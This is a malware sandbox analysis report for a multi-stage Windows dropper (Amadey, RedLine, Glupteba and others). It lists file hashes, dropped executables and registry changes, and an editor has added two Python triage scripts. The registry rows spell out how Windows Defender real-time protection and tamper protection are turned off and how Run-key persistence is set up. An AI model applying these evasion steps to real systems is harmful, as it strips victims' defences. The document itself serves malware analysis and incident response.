memory/1284-706-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-708-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-710-0x00000000005F0000-0x0000000000605000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 52723a238d03cd6af1cfc1b8a7963bf4
SHA1 39e8dcbf08f90c098d8bc8121a71233aa37ae7a5
SHA256 0d0296b3349d314703f822fcbc9dea0a3214bc5521f217b6b775be453a2b0e04
SHA512 688850e940716eca0d1f35f92076ca4e4b86b05008fff7ea9984b95e18dc95f86f2d521d46d9d4d95c2ff7ae65e1c86dc17c252e0f53a85253709c116facae8d

memory/2544-788-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2544-797-0x0000000002864000-0x0000000002867000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d6fd5299a18f59b6be18425adbc641f5
SHA1 0e83d3cfcbbc7ba30a6788cee4fdda05bd78f067
SHA256 33624c24ddd3742cd72e462400127e99ff2b28b3a3666dc3f014f6dcf332fbbe
SHA512 179ad033873cbd57ed1598fd9b55ecd5274140f54d11aada4b308048421dd5aeec4a9388c461c8a3872bbe375c3568dd6d9bcb53ef108b47d35c15f5f6b22bff

memory/2544-807-0x000000000286B000-0x00000000028D2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 865112f524fb42c9db6c4c1e6590bee7
SHA1 7fe9a081add8ad100990bd6ce8f868a8430eda01
SHA256 d66b71211ca1318616cc50eed1cdb7a498a6d89ed0b1ca06bef545b07658a947
SHA512 a168e12ca5cdd05bbe285a0d791bd3b94e6051bed58ea917e60fdbba56e23f0c304b8c8d79501395a29539136dbe4e2253750a23d20a7deecef2b7f427d0b0a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 97aee546638a1bdd39bc980e6c542a59
SHA1 1ac86c02f42ce5aafc7e63552c3b65baad027c5b
SHA256 3f7137aeae0f6aa76ac8c6f4eea5ad68e7e0d0ba50a65a03e5054780b5bd487b
SHA512 ea6a5de12349d0b9993f18a9b9a3f3bf6c0b9554d0006025d4d547048773d050d64a08e05d73ca288c3c78e4f5143d3697d5bb10a708d7e4fd300ea456a10fee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f34693f98703e7529ab375867a89fb1e
SHA1 44f6403094715622e867beb8cbb4dd1aa91e17e5
SHA256 809b69613ee6095425484d214f0f63e61c0ffdf4b5aebd65ce83a7229d56b55c
SHA512 51a9496b6423f8e8f5083a49f29b9928306ec2701d2956427c4761dd2dc4973f3487781b1b730ec90168fea380d8f792236dd1d5962d70aa90acf743b2b57acc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80d54768a2656ea4706e3ba8c4889045
SHA1 9f913246a375ddefdabdcb672aea392f49d5c585
SHA256 21399536ae10145764948f3742d8b2f6f426d17542ca9403a9a23cb742238595
SHA512 cbbadfe817f5f665a09514aa4cead55dd43c24d04c36e445fe43873f7a1059403b2c5d5c165409904bbd879d847eefffcc04d93f2ba71f5ea33491185ab7c467

memory/620-1004-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1005-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1006-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1007-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1009-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/620-1008-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1011-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1033-0x0000000000400000-0x000000000047F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c8b74071943234582c7f2cb25421aa3
SHA1 fd9f225b9283c92877962e352bb1dfe315b8861b
SHA256 ac82150f12d706d1bde12df61f82a0ca8b22efc0e150caaae8b04b82c9a57682
SHA512 95f4bce7641e14a02c6f3581667ac9e64ab758654ff22033a3f2b299f940678d253da283779a544382b8aa5b6f0fc9a419d07958099baed991b648b7223c8780

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 366b3f74a32f80a25111f91e33cf93ff
SHA1 07c258165d056e7cb5099fc8b97fdfbfd096c6ac
SHA256 81bbafb0d1e091c512dc76281a02aef33826a9a7625281857e96e65fa4dce730
SHA512 3c62d5916363bbbcdbf9b74af525a1f71ba04ad0c73665db22763d4e31d357ddf80856c945bdf2440d5a4806858ef98ec991167cb598f3867ae432c718cd6f9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dbcf13d6195144d12d623c4d1b3709c6
SHA1 acad3fd50ff6858e0639d12685112973ec046987
SHA256 c4b9ebe9f6026f1acfadea9a30023656b72dfc7b187bece778c26f72ded78187
SHA512 a8151742d0dfc8508e72514e90dfe4a7651ee408a68a2e15708cfbc888a6b10e799810a46532e9a0436ec4addad2896dad7dd6dc78cc77d38240f2701255b8db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b3647e4796ad6fb307185bd0d4125e85
SHA1 fcd6d5e335a717979938c0471f93bb118d963754
SHA256 efa27a2eae29cde78041c5215d2de058d970066ff999899c0a824cb6dd396451
SHA512 2f5c44f4d6545fed1688d4f427299620a384fee8a99f09c1cadbee106624f8cd1328e1b105bfc98e3ab1654b19ca90c70d69427d41eafba3f700b82a61d7be3e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a06c174a12320d12b0d6c894cb4f535a
SHA1 fd870f16fa2f7e005320be8fb583e3d6182c2499
SHA256 cf89bec1e95821a7a86b43544bb4316e83234fb4bc254324d05f0872848395b9
SHA512 a8537cb1ab66e0b037a5810df52536993ecb08a6498cbf4c1678b3aef59746cd3372548adcc8870979a8a2f10a6d606598e0d8bdd5a5e87c7f569edd83375fb7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 eaee94293a7fd23049fb78d359a98c87
SHA1 05ba0fa42350f631aec35fb75261e86d46a707fe
SHA256 e79a17ce56b0eed58081ab39358c808a88a05cc2f87b81f9c15bb95c1b88a751
SHA512 8abef50151df64d3a6a9fb76b764c69d98fc62b03cdd1984885677293d01af8f17729e839b5530f44b5dc266f5757df7cc6635ee89853f437f3050c9d22c6f7e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a0e0aee86c4fbaba222a431a2cd6f890
SHA1 2d48623f6f29550b4d1d01b671c92f146d405b94
SHA256 325a02dd58227871cd62ce5a28089f94ba99b552a696be3ef95c308d6606dbc3
SHA512 06659d490c57178b51262dea24187d39ee77549ab34fcdd442d784c3a2fd73fa035b29c6eec6bb4e17cb828e018b45d47d70fda08034f29ba8e8c25d903d11e8
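
A file listing like the one above repeats an entry every time the same content is written (the 1ZD37Ls8.exe hash appears under both a drive-less and a C:\ path, for instance) and mixes attacker-dropped files with files Windows writes on its own: CryptoAPI's CryptnetUrlCache entries come from certificate and CRL fetches, the Cab####.tmp/Tar####.tmp pairs in Temp are typically produced by the automatic root-certificate update, and the Content.IE5 and RecoveryStore files belong to the browser. Those hashes are not indicators of this sample. The script below, an added example written for this report rather than tooling from the sandbox, parses a listing in the format used above, merges entries by SHA256, and separates candidate payload hashes from that background noise. The noise path patterns are the editor's assumption and should be tuned to the environment; anything they do not match stays in the candidate set.

```python
"""Collapse a sandbox 'Files' listing into unique artefacts and separate
attacker-written files from Windows background noise.

Added example written for this report; it is not tooling from the sandbox
vendor. The listing grammar (path line followed by MD5/SHA1/SHA256/SHA512
lines, memory dumps as 'memory/...' lines) follows the report above. The
noise patterns are the editor's assumption about paths Windows writes on
its own during a detonation.
"""
import re
from collections import OrderedDict

# Constructed input: entries copied from the listing above (SHA1/SHA512 lines
# omitted for brevity; the parser accepts them), including the repeats a
# sandbox emits every time the same content is written again.
SAMPLE_LISTING = r"""
\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe

MD5 f1432a4597fa0744d496cbe8ebd50fd5
SHA256 85f10bec21a78984acfed0f51a06e75b597b8a880f98e6e76af1438b3f5eef5f

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe

MD5 f1432a4597fa0744d496cbe8ebd50fd5
SHA256 85f10bec21a78984acfed0f51a06e75b597b8a880f98e6e76af1438b3f5eef5f

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9b53debd7c676882ae74cb176a6d3ee3
SHA256 6b8c63f023f0d02cb0251d29accbe1261e937077bc516263f9cfae536581326f

C:\Users\Admin\AppData\Local\Temp\Cab5469.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

memory/2396-184-0x0000000000960000-0x000000000096A000-memory.dmp
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
# Editor's assumption: paths written by Windows itself, not by the sample.
NOISE_RE = re.compile(
    r"\\CryptnetUrlCache\\|\\Temporary Internet Files\\|\\Internet Explorer\\Recovery\\"
    r"|\\Temp\\(?:Cab|Tar)[0-9A-F]{4}\.tmp$",
    re.IGNORECASE,
)


def parse_listing(text):
    """Return (files, dumps): files as dicts with 'path' plus the hash lines
    that followed it; dumps as the raw memory/... identifiers."""
    files, dumps, current = [], [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
        elif line.startswith("memory/"):
            dumps.append(line)
            current = None
        else:
            current = {"path": line}
            files.append(current)
    return files, dumps


def unique_by_sha256(files):
    """Merge repeated writes of identical content, keeping every path it was
    written to (the listing mixes '\\Users\\...' and 'C:\\Users\\...' forms)."""
    merged = OrderedDict()
    for f in files:
        sha = f.get("SHA256")
        if not sha:
            continue
        entry = merged.setdefault(sha, {"sha256": sha, "md5": f.get("MD5"), "paths": []})
        if f["path"] not in entry["paths"]:
            entry["paths"].append(f["path"])
    return list(merged.values())


def is_noise(path):
    return NOISE_RE.search(path) is not None


def triage(text):
    """Split unique artefacts into hash-worthy candidates and background noise."""
    files, dumps = parse_listing(text)
    result = {"candidates": [], "noise": [], "dumps": dumps}
    for entry in unique_by_sha256(files):
        bucket = "noise" if all(is_noise(p) for p in entry["paths"]) else "candidates"
        result[bucket].append(entry)
    return result


if __name__ == "__main__":
    r = triage(SAMPLE_LISTING)
    for e in r["candidates"]:
        print(e["sha256"], " | ".join(e["paths"]))
    print(f"{len(r['noise'])} noise entries, {len(r['dumps'])} memory dumps skipped")
```

Pass the full listing text to triage() to get a deduplicated candidate hash set for a blocklist. The candidate set still needs a look by hand: the filter only removes known Windows noise, so a renamed legitimate binary dropped by the sample, such as the updater.exe placed under Program Files\Google\Chrome in the second run, stays in it, which is the intended behaviour.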

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:37

Reported

2023-10-10 20:58

Platform

win10v2004-20230915-en

Max time kernel

135s

Max time network

179s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\37C9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6A06.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2DE3.bat N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2A18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2DE3.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\30C2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\37C9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6A06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76C8.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76C8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76C8.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2A18.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
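
The registry rows in the Defender and Run-key tables above are the ones that matter most for response. 3160.exe turns off Defender's real-time components through HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection and tries to zero Features\TamperProtection; where Tamper Protection is enabled that write is blocked, but the attempt is itself worth alerting on. The RunOnce values wextract_cleanup0 through wextract_cleanup4 are written by the IExpress/wextract self-extractor to delete its own IXP00n.TMP directory on next logon, so they mark five nested SFX layers rather than attacker persistence, whereas the HKCU Run\csrss value that relaunches C:\Windows\rss\csrss.exe is real persistence. The script below, an added example written for this report and not vendor tooling, parses rows in the flattened "Description Indicator Process Target" format, undoes the sandbox's \" and \\ escaping, and sorts the rows into those buckets. The row grammar is inferred from the tables above and the category rules are the editor's own.

```python
"""Normalise the sandbox's flattened 'Description Indicator Process Target'
rows into records and tag the behaviours documented above: Windows Defender
policy tampering and Run/RunOnce persistence, with the wextract_cleanup
RunOnce values (written by the IExpress/wextract SFX stub to delete its own
IXPnnn.TMP directory) kept apart from real autoruns.

Added example for this report, not code from the sandbox vendor. The row
grammar is inferred from the rows above; the category rules are the editor's.
"""
import re

# Constructed input: rows copied verbatim from the signature tables above.
SAMPLE_ROWS = r'''
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2A18.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\37C9.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
'''.strip().splitlines()

ROW_RE = re.compile(
    r'^(?P<action>Set value \((?P<vtype>\w+)\)|Key (?:created|opened|queried|enumerated|value queried)'
    r'|File (?:created|opened(?: \(read-only\)| for modification)?))'
    r'\s+(?P<target>.+?)'
    r'(?:\s+=\s+"(?P<value>(?:[^"\\]|\\.)*)")?'  # value as the sandbox escapes it
    r'\s+(?P<process>[A-Z]:\\.+?)\s+N/A$'
)
DEFENDER_POLICY = '\\software\\policies\\microsoft\\windows defender\\'


def parse_row(row):
    """Return a dict for one row, or None when it does not fit the grammar."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    rec = m.groupdict()
    if rec["value"] is not None:
        rec["value"] = re.sub(r'\\(.)', r'\1', rec["value"])  # undo \" and \\ escaping
    return rec


def classify(rec):
    """Editor's rules: Defender policy Disable*=1 or TamperProtection=0,
    wextract self-cleanup RunOnce values, any other Run/RunOnce value."""
    t = rec["target"].lower()
    v = rec["value"]
    if rec["action"].startswith("Set value"):
        if DEFENDER_POLICY in t and t.rsplit("\\", 1)[-1].startswith("disable") and v == "1":
            return "defender_tamper"
        if t.endswith("\\windows defender\\features\\tamperprotection") and v == "0":
            return "defender_tamper"
        if re.search(r"\\currentversion\\runonce\\wextract_cleanup\d+$", t):
            return "sfx_cleanup"
        if re.search(r"\\currentversion\\run(?:once)?\\", t):
            return "autorun"
    elif rec["action"] == "Key created" and DEFENDER_POLICY in t:
        return "defender_tamper"
    return "other"


def triage_rows(rows):
    """Aggregate rows into the facts an analyst pulls out of the signature tables."""
    out = {"defender_tamper_processes": [], "autorun": [], "sfx_layers": [], "other": 0, "unparsed": []}
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            out["unparsed"].append(row)
            continue
        cat = classify(rec)
        if cat == "defender_tamper":
            if rec["process"] not in out["defender_tamper_processes"]:
                out["defender_tamper_processes"].append(rec["process"])
        elif cat == "sfx_cleanup":
            layer = re.search(r"IXP\d{3}\.TMP", rec["value"])
            out["sfx_layers"].append(layer.group(0) if layer else rec["value"])
        elif cat == "autorun":
            out["autorun"].append((rec["target"], rec["value"], rec["process"]))
        else:
            out["other"] += 1
    return out


if __name__ == "__main__":
    summary = triage_rows(SAMPLE_ROWS)
    print("Defender tampering by:", summary["defender_tamper_processes"])
    print("SFX layers unpacked:", summary["sfx_layers"])
    for target, value, proc in summary["autorun"]:
        print("autorun", target.rsplit("\\", 1)[-1], "=", value, "set by", proc)
```

Feed triage_rows every row of a report rather than one table at a time; rows that do not fit the grammar are returned under "unparsed" instead of being dropped, so a new action verb in a future report shows up rather than vanishing silently.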

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
